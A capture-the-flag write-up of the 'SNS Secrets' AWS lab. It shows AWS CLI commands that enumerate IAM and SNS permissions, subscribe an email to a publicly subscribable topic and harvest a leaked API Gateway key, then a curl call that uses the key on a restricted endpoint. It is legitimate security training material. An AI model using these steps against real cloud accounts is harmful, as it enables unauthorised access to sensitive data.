SNS Secrets

Challenge Lab (Easy) - by Tyler Ramsbey

CourseStackwww.hacksmarter.org

The following post by 0xb0b is licensed under CC BY 4.0

Scenario

Objective / Scope

As part of the Hack Smarter Red Team’s new cloud offering, you have been assigned a penetration test focusing on AWS infrastructure. This engagement operates under an "assumed-breach" framework.

You will begin with a set of compromised, low-privilege AWS CLI credentials. The client has identified a sensitive internal API Gateway as a critical asset. They are concerned that an attacker inside the environment could manipulate permissions to access this resource.

Objective: Demonstrate the impact of the breach by escalating privileges to successfully invoke the restricted API Gateway endpoint.

Summary

In 'SNS Secrets', we start by using low-privileged AWS CLI credentials in an assumed-breach scenario within a controlled cloud environment. Through analysing IAM policies, we identify permissions that allow us to enumerate and interact with Amazon SNS. Having discovered a publicly subscribable SNS topic, we register our own email endpoint and confirm the subscription. Inadvertently, we receive a broadcasted message containing a sensitive API Gateway key. Using this leaked credential, we enumerate the deployed API Gateway resources and construct a valid invocation URL. By using the exposed key, we are able to successfully invoke the restricted /user-data endpoint. This demonstrates how misconfigured SNS topic policies can lead to privilege escalation and unauthorised access to sensitive internal APIs.

Amazon SNS

Push Notification Service - Amazon Simple Notification Service - AWSAmazon Web Services, Inc.

Amazon Simple Notification Service (SNS) is a managed AWS service that enables asynchronous communication between publishers and subscribers. Publishers send messages to a topic, which acts as a central communication channel, and subscribed clients automatically receive those messages through supported endpoints such as SQS, Lambda, HTTP, email, or SMS.

Setup

Whitelist IP & Creation Of The Scenario

We access the lab environment via the provided web interface to ensure our IP is whitelisted and the scenario is properly initialized.

http://[machine-ip]:8000

From the Command Output we can retrieve the access_key and secret_access_key to configure our aws profile to access the lab environment.

Configure Profile

We configure a dedicated AWS CLI profile using the provided credentials.

Also set the region to us-east-1, as this will be needed later.

aws configure --profile sns-secrets

Verify Access

We confirm that the credentials are valid and identify the AWS account and IAM principal we are operating as.

aws sts get-caller-identity --profile sns-secrets

Manual Approach

Inspect IAM User Policies

First we list the IAM policies directly attached to the IAM user cg-sns-user-cgidmicq271l9a to understand what permissions are explicitly granted.

aws iam list-user-policies --user-name cg-sns-user-cgidmicq271l9a --profile sns-secrets --no-cli-pager

We retrieve the following policy:

cg-sns-user-policy-cgidmicq271l9a

We inspect the policy to identify allowed actions, focusing on SNS permissions and any API Gateway access or restrictions.

This policy lets the user enumerate SNS topics and subscriptions and receive SNS messages, plus read-only IAM self-introspection and limited API Gateway GET access, with explicit denies blocking sensitive API Gateway paths.

aws iam get-user-policy --user-name cg-sns-user-cgidmicq271l9a --policy-name cg-sns-user-policy-cgidmicq271l9a --profile sns-secrets --no-cli-pager

sns:ListTopics → list all SNS topics in the account
sns:ListSubscriptionsByTopic → enumerate who/what is subscribed
sns:Subscribe → subscribe an endpoint (email/HTTP/SQS/etc.) to a topic
sns:Receive → receive messages (mainly relevant for SQS/Lambda-backed subs

Next, we enumerate all SNS topics in the account to identify potential messaging channels we can interact with. If not already done, the region must now be set so that we can obtain results.

aws sns list-topics --profile sns-secrets --no-cli-pager

We identify the topic arn:aws:sns:us-east-1:703671921227:public-topic-cgidmicq271l9a as the one related to our unique CGID value.

aws configure set region us-east-1 --profile sns-secrets

aws sns list-topics --profile sns-secrets --no-cli-pager

arn:aws:sns:us-east-1:703671921227:public-topic-cgidmicq271l9a

We check whether any endpoints are already subscribed to the topic and confirm that it is currently unused.

aws sns list-subscriptions-by-topic --topic-arn 'arn:aws:sns:us-east-1:703671921227:public-topic-cgidmicq271l9a' --profile sns-secrets --no-cli-pager

We review the topic policy with the following command and confirm that the Principal is set to "*", meaning anyone can subscribe to this SNS topic

aws sns get-topic-attributes --topic-arn arn:aws:sns:us-east-1:703671921227:public-topic-cgidmicq271l9a --profile sns-secrets --no-cli-pager

We subscribe with a email address (using 10 minute mail in this case) to the topic, allowing us to receive any messages published to it.

10 Minute Mail - Free Anonymous Temporary email10minutemail.com

aws sns subscribe \
  --topic-arn arn:aws:sns:us-east-1:703671921227:public-topic-cgidmicq271l9a \
  --protocol email \
  --notification-endpoint grggwjmjzofzgvajyl@fxavaj.com \
  --profile sns-secrets \
  --no-cli-pager

We receive a mail and confirm our subscription via the link provided.

We confirm that our subscription is active and ready to receive SNS messages.

aws sns list-subscriptions-by-topic --topic-arn arn:aws:sns:us-east-1:703671921227:public-topic-cgidmicq271l9a --profile sns-secrets --no-cli-pager

Sensitive Data Exposure

We receive an SNS message containing a sensitive API Gateway key, demonstrating how SNS misconfigurations can leak credentials to unauthorized subscribers.

DEBUG: API GATEWAY KEY:

qeGG67O8ml6xXPisb7jxO3no5QKBSg6F8zLmbxbx

API Gateway Enumeration

We enumerate available API Gateway instances to identify the target API and retrieve its unique API ID.

First, let’s retrieve basic information, such as the Gateway ID on the target API.

 aws apigateway get-rest-apis --profile sns-secrets --region us-east-1 --no-cli-pager

We identify deployed stages for the API, which are required to construct a valid invocation URL.

Using this ID we can get the Gateway stages and resources.

aws apigateway get-stages --rest-api-id i75z7g35l3 --profile sns-secrets --region us-east-1 --no-cli-pager

stageName:prod-cgidmicq271l9a

We enumerate available API paths to identify accessible endpoints, including the restricted /user-data resource

aws apigateway get-resources --rest-api-id i75z7g35l3 --profile sns-secrets --region us-east-1 --no-cli-pager

path:/user-data

API Invocation

Using the API ID, stage name, and resource path, we build the full API Gateway invoke URL.

https://[API-ID].execute-api.us-east-1.amazonaws.com/[stageName]/[resourcePath]

https://i75z7g35l3.execute-api.us-east-1.amazonaws.com/prod-cgidmicq271l9a/user-data

We successfully invoke the restricted API endpoint using the leaked API key and retrieve the final flag.

curl -X GET "[API Gateway URL]" -H "x-api-key: qeGG67O8ml6xXPisb7jxO3no5QKBSg6F8zLmbxbx"

curl -X GET "https://i75z7g35l3.execute-api.us-east-1.amazonaws.com/prod-cgidmicq271l9a/user-data" -H "x-api-key: qeGG67O8ml6xXPisb7jxO3no5QKBSg6F8zLmbxbx"

Pacu Approach

The following link provides the solution using Pacu, an AWS exploitation framework by Rhino Security Labs described by Tyler Ramsbey:

CloudGoat: New Scenario and Walkthrough (sns_secrets)Rhino Security Labs

PreviousHunter NextNorthBridge Systems

Last updated 1 day ago

Was this helpful?